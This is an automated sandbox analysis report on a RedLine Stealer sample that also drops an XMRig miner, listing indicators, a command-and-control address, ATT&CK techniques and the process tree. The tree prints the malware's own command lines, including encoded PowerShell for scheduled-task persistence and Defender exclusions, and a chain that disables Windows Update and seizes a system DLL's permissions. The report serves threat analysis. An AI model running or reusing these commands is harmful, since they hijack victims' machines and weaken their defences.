redline | 348754315241bc2b6627b015f97354701bf65255db2604b679dc4762f30c1da4

Analysis

max time kernel
102s
max time network
106s
platform
windows10-1703_x64
resource
win10-20220812-en
resource tags

arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system
submitted
16-08-2022 10:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

348754315241bc2b6627b015f97354701bf65255db2604b679dc4762f30c1da4.exe
Size

12.6MB
MD5

b378f607d65dbbceded6f57aafd08629
SHA1

85c297246e6ef5d19b2b469783ecd5a13b217ac1
SHA256

348754315241bc2b6627b015f97354701bf65255db2604b679dc4762f30c1da4
SHA512

7a5b157f89ff3bb29be3b279e8645fd61acca9dec32537fb966ea2695a580d855618ec65b2e43576cb15ac61c90213f5dc68d5cb41c9af3b1b4da8514bc07748

Score

10^/10

redline xmrig 1137502411 discovery evasion exploit infostealer miner spyware vmprotect

Malware Config

Extracted

Family

redline

Botnet

1137502411

193.124.22.27:8362

Signatures

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/214172-209-0x00000000001A973E-mapping.dmp	family_redline
behavioral2/memory/214172-247-0x0000000000190000-0x00000000001AE000-memory.dmp	family_redline

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 6 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/5332-715-0x000000014036EAC4-mapping.dmp	xmrig
behavioral2/memory/5332-720-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral2/memory/5332-817-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral2/memory/6976-848-0x000000014036EAC4-mapping.dmp	xmrig
behavioral2/memory/6976-855-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral2/memory/6976-857-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig

Downloads MZ/PE file

Drops file in Drivers directory 2 IoCs

Processes:

ABFrameworkSvc.exeupdater.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	ABFrameworkSvc.exe
File opened for modification	C:\Windows\system32\drivers\etc\hosts	updater.exe

Executes dropped EXE 5 IoCs

Processes:

Setup.exeWinRAR.exeupdater.exeABFrameworkSvc.exeupdater.exe

pid process

4688 Setup.exe
4152 WinRAR.exe
4196 updater.exe
2732 ABFrameworkSvc.exe
5964 updater.exe
Possible privilege escalation attempt 4 IoCs
exploit

Processes:

takeown.exeicacls.exetakeown.exeicacls.exe

pid process

5788 takeown.exe
5828 icacls.exe
6744 takeown.exe
6760 icacls.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

pid	process
5788	takeown.exe
5828	icacls.exe
6744	takeown.exe
6760	icacls.exe

VMProtect packed file 8 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Setup.exe	vmprotect
C:\Users\Admin\AppData\Local\Temp\Setup.exe	vmprotect
behavioral2/memory/4688-203-0x0000000000400000-0x0000000001407000-memory.dmp	vmprotect
behavioral2/memory/4688-292-0x0000000000400000-0x0000000001407000-memory.dmp	vmprotect
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe	vmprotect
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe	vmprotect
behavioral2/memory/4196-483-0x0000000000400000-0x0000000001407000-memory.dmp	vmprotect
behavioral2/memory/4196-692-0x0000000000400000-0x0000000001407000-memory.dmp	vmprotect

Modifies file permissions 1 TTPs 4 IoCs
discovery

File Permissions Modification
T1222

Processes:

takeown.exeicacls.exetakeown.exeicacls.exe

pid process

5788 takeown.exe
5828 icacls.exe
6744 takeown.exe
6760 icacls.exe
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

pid	process
5788	takeown.exe
5828	icacls.exe
6744	takeown.exe
6760	icacls.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

WinRAR.execonhost.exeupdater.exe

description	pid	process	target process
PID 4152 set thread context of 214172	4152	WinRAR.exe	AppLaunch.exe
PID 1712 set thread context of 5332	1712	conhost.exe	conhost.exe
PID 5964 set thread context of 6976	5964	updater.exe	explorer.exe

Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

6592 sc.exe
6648 sc.exe
5480 sc.exe
5500 sc.exe
5520 sc.exe
6608 sc.exe
6632 sc.exe
5460 sc.exe
5548 sc.exe
6572 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

pid	process
6592	sc.exe
6648	sc.exe
5480	sc.exe
5500	sc.exe
5520	sc.exe
6608	sc.exe
6632	sc.exe
5460	sc.exe
5548	sc.exe
6572	sc.exe

Modifies registry key 1 TTPs 18 IoCs

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid	process
6200	reg.exe
6220	reg.exe
6664	reg.exe
6696	reg.exe
6728	reg.exe
5600	reg.exe
5764	reg.exe
6180	reg.exe
6908	reg.exe
6132	reg.exe
6712	reg.exe
6868	reg.exe
6680	reg.exe
6888	reg.exe
6928	reg.exe
5628	reg.exe
5680	reg.exe
5732	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

Setup.execonhost.exepowershell.exeAppLaunch.exeupdater.exepowershell.execonhost.execonhost.exeABFrameworkSvc.exepowershell.exepowershell.exeupdater.exeexplorer.exe

pid	process
4688	Setup.exe
4688	Setup.exe
214592	conhost.exe
214972	powershell.exe
214972	powershell.exe
214972	powershell.exe
214172	AppLaunch.exe
4196	updater.exe
4196	updater.exe
214172	AppLaunch.exe
3488	powershell.exe
3488	powershell.exe
3488	powershell.exe
1712	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
2732	ABFrameworkSvc.exe
5332	conhost.exe
5332	conhost.exe
5560	powershell.exe
5560	powershell.exe
5560	powershell.exe
5332	conhost.exe
5332	conhost.exe
6028	powershell.exe
6028	powershell.exe
5332	conhost.exe
5332	conhost.exe
6028	powershell.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5964	updater.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
6976	explorer.exe
6976	explorer.exe
5332	conhost.exe
5332	conhost.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

624

pid	process
624

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

AppLaunch.execonhost.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	214172	AppLaunch.exe
Token: SeDebugPrivilege	214592	conhost.exe
Token: SeShutdownPrivilege	214800	powercfg.exe
Token: SeCreatePagefilePrivilege	214800	powercfg.exe
Token: SeShutdownPrivilege	214852	powercfg.exe
Token: SeCreatePagefilePrivilege	214852	powercfg.exe
Token: SeShutdownPrivilege	214888	powercfg.exe
Token: SeCreatePagefilePrivilege	214888	powercfg.exe
Token: SeShutdownPrivilege	214912	powercfg.exe
Token: SeCreatePagefilePrivilege	214912	powercfg.exe
Token: SeDebugPrivilege	214972	powershell.exe
Token: SeIncreaseQuotaPrivilege	214972	powershell.exe
Token: SeSecurityPrivilege	214972	powershell.exe
Token: SeTakeOwnershipPrivilege	214972	powershell.exe
Token: SeLoadDriverPrivilege	214972	powershell.exe
Token: SeSystemProfilePrivilege	214972	powershell.exe
Token: SeSystemtimePrivilege	214972	powershell.exe
Token: SeProfSingleProcessPrivilege	214972	powershell.exe
Token: SeIncBasePriorityPrivilege	214972	powershell.exe
Token: SeCreatePagefilePrivilege	214972	powershell.exe
Token: SeBackupPrivilege	214972	powershell.exe
Token: SeRestorePrivilege	214972	powershell.exe
Token: SeShutdownPrivilege	214972	powershell.exe
Token: SeDebugPrivilege	214972	powershell.exe
Token: SeSystemEnvironmentPrivilege	214972	powershell.exe
Token: SeRemoteShutdownPrivilege	214972	powershell.exe
Token: SeUndockPrivilege	214972	powershell.exe
Token: SeManageVolumePrivilege	214972	powershell.exe
Token: 33	214972	powershell.exe
Token: 34	214972	powershell.exe
Token: 35	214972	powershell.exe
Token: 36	214972	powershell.exe
Token: SeIncreaseQuotaPrivilege	214972	powershell.exe
Token: SeSecurityPrivilege	214972	powershell.exe
Token: SeTakeOwnershipPrivilege	214972	powershell.exe
Token: SeLoadDriverPrivilege	214972	powershell.exe
Token: SeSystemProfilePrivilege	214972	powershell.exe
Token: SeSystemtimePrivilege	214972	powershell.exe
Token: SeProfSingleProcessPrivilege	214972	powershell.exe
Token: SeIncBasePriorityPrivilege	214972	powershell.exe
Token: SeCreatePagefilePrivilege	214972	powershell.exe
Token: SeBackupPrivilege	214972	powershell.exe
Token: SeRestorePrivilege	214972	powershell.exe
Token: SeShutdownPrivilege	214972	powershell.exe
Token: SeDebugPrivilege	214972	powershell.exe
Token: SeSystemEnvironmentPrivilege	214972	powershell.exe
Token: SeRemoteShutdownPrivilege	214972	powershell.exe
Token: SeUndockPrivilege	214972	powershell.exe
Token: SeManageVolumePrivilege	214972	powershell.exe
Token: 33	214972	powershell.exe
Token: 34	214972	powershell.exe
Token: 35	214972	powershell.exe
Token: 36	214972	powershell.exe
Token: SeIncreaseQuotaPrivilege	214972	powershell.exe
Token: SeSecurityPrivilege	214972	powershell.exe
Token: SeTakeOwnershipPrivilege	214972	powershell.exe
Token: SeLoadDriverPrivilege	214972	powershell.exe
Token: SeSystemProfilePrivilege	214972	powershell.exe
Token: SeSystemtimePrivilege	214972	powershell.exe
Token: SeProfSingleProcessPrivilege	214972	powershell.exe
Token: SeIncBasePriorityPrivilege	214972	powershell.exe
Token: SeCreatePagefilePrivilege	214972	powershell.exe
Token: SeBackupPrivilege	214972	powershell.exe
Token: SeRestorePrivilege	214972	powershell.exe

Suspicious use of FindShellTrayWindow 37 IoCs

Processes:

conhost.exe

pid	process
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe

Suspicious use of SendNotifyMessage 37 IoCs

Processes:

conhost.exe

pid	process
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe
5332	conhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

348754315241bc2b6627b015f97354701bf65255db2604b679dc4762f30c1da4.exeWinRAR.exeSetup.execonhost.execmd.exeAppLaunch.exeABFrameworkSvc.exeupdater.execonhost.execmd.execmd.exe

description	pid	process	target process
PID 388 wrote to memory of 4688	388	348754315241bc2b6627b015f97354701bf65255db2604b679dc4762f30c1da4.exe	Setup.exe
PID 388 wrote to memory of 4688	388	348754315241bc2b6627b015f97354701bf65255db2604b679dc4762f30c1da4.exe	Setup.exe
PID 388 wrote to memory of 4152	388	348754315241bc2b6627b015f97354701bf65255db2604b679dc4762f30c1da4.exe	WinRAR.exe
PID 388 wrote to memory of 4152	388	348754315241bc2b6627b015f97354701bf65255db2604b679dc4762f30c1da4.exe	WinRAR.exe
PID 388 wrote to memory of 4152	388	348754315241bc2b6627b015f97354701bf65255db2604b679dc4762f30c1da4.exe	WinRAR.exe
PID 4152 wrote to memory of 214172	4152	WinRAR.exe	AppLaunch.exe
PID 4152 wrote to memory of 214172	4152	WinRAR.exe	AppLaunch.exe
PID 4152 wrote to memory of 214172	4152	WinRAR.exe	AppLaunch.exe
PID 4152 wrote to memory of 214172	4152	WinRAR.exe	AppLaunch.exe
PID 4152 wrote to memory of 214172	4152	WinRAR.exe	AppLaunch.exe
PID 4688 wrote to memory of 214592	4688	Setup.exe	conhost.exe
PID 4688 wrote to memory of 214592	4688	Setup.exe	conhost.exe
PID 4688 wrote to memory of 214592	4688	Setup.exe	conhost.exe
PID 214592 wrote to memory of 214700	214592	conhost.exe	cmd.exe
PID 214592 wrote to memory of 214700	214592	conhost.exe	cmd.exe
PID 214700 wrote to memory of 214800	214700	cmd.exe	powercfg.exe
PID 214700 wrote to memory of 214800	214700	cmd.exe	powercfg.exe
PID 214700 wrote to memory of 214852	214700	cmd.exe	powercfg.exe
PID 214700 wrote to memory of 214852	214700	cmd.exe	powercfg.exe
PID 214700 wrote to memory of 214888	214700	cmd.exe	powercfg.exe
PID 214700 wrote to memory of 214888	214700	cmd.exe	powercfg.exe
PID 214700 wrote to memory of 214912	214700	cmd.exe	powercfg.exe
PID 214700 wrote to memory of 214912	214700	cmd.exe	powercfg.exe
PID 214592 wrote to memory of 214972	214592	conhost.exe	powershell.exe
PID 214592 wrote to memory of 214972	214592	conhost.exe	powershell.exe
PID 214172 wrote to memory of 2732	214172	AppLaunch.exe	ABFrameworkSvc.exe
PID 214172 wrote to memory of 2732	214172	AppLaunch.exe	ABFrameworkSvc.exe
PID 2732 wrote to memory of 3488	2732	ABFrameworkSvc.exe	powershell.exe
PID 2732 wrote to memory of 3488	2732	ABFrameworkSvc.exe	powershell.exe
PID 4196 wrote to memory of 1712	4196	updater.exe	conhost.exe
PID 4196 wrote to memory of 1712	4196	updater.exe	conhost.exe
PID 4196 wrote to memory of 1712	4196	updater.exe	conhost.exe
PID 1712 wrote to memory of 5128	1712	conhost.exe	cmd.exe
PID 1712 wrote to memory of 5128	1712	conhost.exe	cmd.exe
PID 5128 wrote to memory of 5176	5128	cmd.exe	powercfg.exe
PID 5128 wrote to memory of 5176	5128	cmd.exe	powercfg.exe
PID 5128 wrote to memory of 5196	5128	cmd.exe	powercfg.exe
PID 5128 wrote to memory of 5196	5128	cmd.exe	powercfg.exe
PID 5128 wrote to memory of 5212	5128	cmd.exe	powercfg.exe
PID 5128 wrote to memory of 5212	5128	cmd.exe	powercfg.exe
PID 5128 wrote to memory of 5228	5128	cmd.exe	powercfg.exe
PID 5128 wrote to memory of 5228	5128	cmd.exe	powercfg.exe
PID 1712 wrote to memory of 5248	1712	conhost.exe	conhost.exe
PID 1712 wrote to memory of 5248	1712	conhost.exe	conhost.exe
PID 1712 wrote to memory of 5248	1712	conhost.exe	conhost.exe
PID 1712 wrote to memory of 5332	1712	conhost.exe	conhost.exe
PID 1712 wrote to memory of 5332	1712	conhost.exe	conhost.exe
PID 1712 wrote to memory of 5332	1712	conhost.exe	conhost.exe
PID 1712 wrote to memory of 5332	1712	conhost.exe	conhost.exe
PID 1712 wrote to memory of 5332	1712	conhost.exe	conhost.exe
PID 1712 wrote to memory of 5332	1712	conhost.exe	conhost.exe
PID 1712 wrote to memory of 5332	1712	conhost.exe	conhost.exe
PID 1712 wrote to memory of 5332	1712	conhost.exe	conhost.exe
PID 1712 wrote to memory of 5332	1712	conhost.exe	conhost.exe
PID 1712 wrote to memory of 5332	1712	conhost.exe	conhost.exe
PID 1712 wrote to memory of 5332	1712	conhost.exe	conhost.exe
PID 1712 wrote to memory of 5332	1712	conhost.exe	conhost.exe
PID 1712 wrote to memory of 5332	1712	conhost.exe	conhost.exe
PID 1712 wrote to memory of 5332	1712	conhost.exe	conhost.exe
PID 1712 wrote to memory of 5332	1712	conhost.exe	conhost.exe
PID 2732 wrote to memory of 5416	2732	ABFrameworkSvc.exe	cmd.exe
PID 2732 wrote to memory of 5416	2732	ABFrameworkSvc.exe	cmd.exe
PID 5416 wrote to memory of 5460	5416	cmd.exe	sc.exe
PID 5416 wrote to memory of 5460	5416	cmd.exe	sc.exe

C:\Users\Admin\AppData\Local\Temp\348754315241bc2b6627b015f97354701bf65255db2604b679dc4762f30c1da4.exe
"C:\Users\Admin\AppData\Local\Temp\348754315241bc2b6627b015f97354701bf65255db2604b679dc4762f30c1da4.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:388

C:\Users\Admin\AppData\Local\Temp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\Setup.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4688

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Setup.exe"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:214592

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
4⤵
- Suspicious use of WriteProcessMemory
PID:214700

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:214800

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:214852

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:214888

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:214912

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AaABnACMAPgAgAFIAZQBnAGkAcwB0AGUAcgAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAAtAEEAYwB0AGkAbwBuACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAQQBjAHQAaQBvAG4AIAAtAEUAeABlAGMAdQB0AGUAIAAnACIAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABHAG8AbwBnAGwAZQBcAEMAaAByAG8AbQBlAFwAdQBwAGQAYQB0AGUAcgAuAGUAeABlACIAJwApACAAPAAjAGIAbwBwAGUAIwA+ACAALQBUAHIAaQBnAGcAZQByACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAVAByAGkAZwBnAGUAcgAgAC0AQQB0AEwAbwBnAE8AbgApACAAPAAjAGcAagAjAD4AIAAtAFMAZQB0AHQAaQBuAGcAcwAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFMAZQB0AHQAaQBuAGcAcwBTAGUAdAAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAGkAcwBhAGwAbABvAHcASABhAHIAZABUAGUAcgBtAGkAbgBhAHQAZQAgAC0ARABvAG4AdABTAHQAbwBwAEkAZgBHAG8AaQBuAGcATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAATwBuAEkAZABsAGUARQBuAGQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0ARABhAHkAcwAgADEAMAAwADAAKQApACAAPAAjAGwAYwAjAD4AIAAtAFQAYQBzAGsATgBhAG0AZQAgACcARwBvAG8AZwBsAGUAVQBwAGQAYQB0AGUAVABhAHMAawBNAGEAYwBoAGkAbgBlAFEAQwAnACAAIAAtAFIAdQBuAEwAZQB2AGUAbAAgACcASABpAGcAaABlAHMAdAAnACAALQBGAG8AcgBjAGUAIAA8ACMAbQBpAHkAIwA+ADsAIABDAG8AcAB5AC0ASQB0AGUAbQAgACcAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXABTAGUAdAB1AHAALgBlAHgAZQAnACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AIAAnAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwARwBvAG8AZwBsAGUAXABDAGgAcgBvAG0AZQBcAHUAcABkAGEAdABlAHIALgBlAHgAZQAnACAALQBGAG8AcgBjAGUAIAA8ACMAaAB0ACMAPgA7ACAAUwB0AGEAcgB0AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgADwAIwBzAHMAbQB4ACMAPgAgAC0AVABhAHMAawBOAGEAbQBlACAAJwBHAG8AbwBnAGwAZQBVAHAAZABhAHQAZQBUAGEAcwBrAE0AYQBjAGgAaQBuAGUAUQBDACcAOwA="
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:214972

C:\Users\Admin\AppData\Local\Temp\WinRAR.exe
"C:\Users\Admin\AppData\Local\Temp\WinRAR.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4152

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:214172

C:\Users\Admin\AppData\Local\Temp\ABFrameworkSvc.exe
"C:\Users\Admin\AppData\Local\Temp\ABFrameworkSvc.exe"
4⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2732

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGoAeABnAHMAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwByAGwAaABxACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeABrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAYgBvAGUAIwA+AA=="
5⤵
- Suspicious behavior: EnumeratesProcesses
PID:3488

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
5⤵
- Suspicious use of WriteProcessMemory
PID:5416

C:\Windows\system32\sc.exe
sc stop UsoSvc
6⤵
- Launches sc.exe
PID:5460

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
6⤵
- Launches sc.exe
PID:5480

C:\Windows\system32\sc.exe
sc stop wuauserv
6⤵
- Launches sc.exe
PID:5500

C:\Windows\system32\sc.exe
sc stop bits
6⤵
- Launches sc.exe
PID:5520

C:\Windows\system32\sc.exe
sc stop dosvc
6⤵
- Launches sc.exe
PID:5548

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
6⤵
- Modifies registry key
PID:5600

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
6⤵
- Modifies registry key
PID:5628

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
6⤵
- Modifies security service
- Modifies registry key
PID:5680

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
6⤵
- Modifies registry key
PID:5732

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
6⤵
- Modifies registry key
PID:5764

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
6⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5788

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
6⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5828

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
6⤵
- Modifies registry key
PID:6132

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
6⤵
- Modifies registry key
PID:6180

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
6⤵
- Modifies registry key
PID:6200

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
6⤵
- Modifies registry key
PID:6220

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
6⤵
PID:6240

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
6⤵
PID:6272

C:\Windows\system32\schtasks.exe
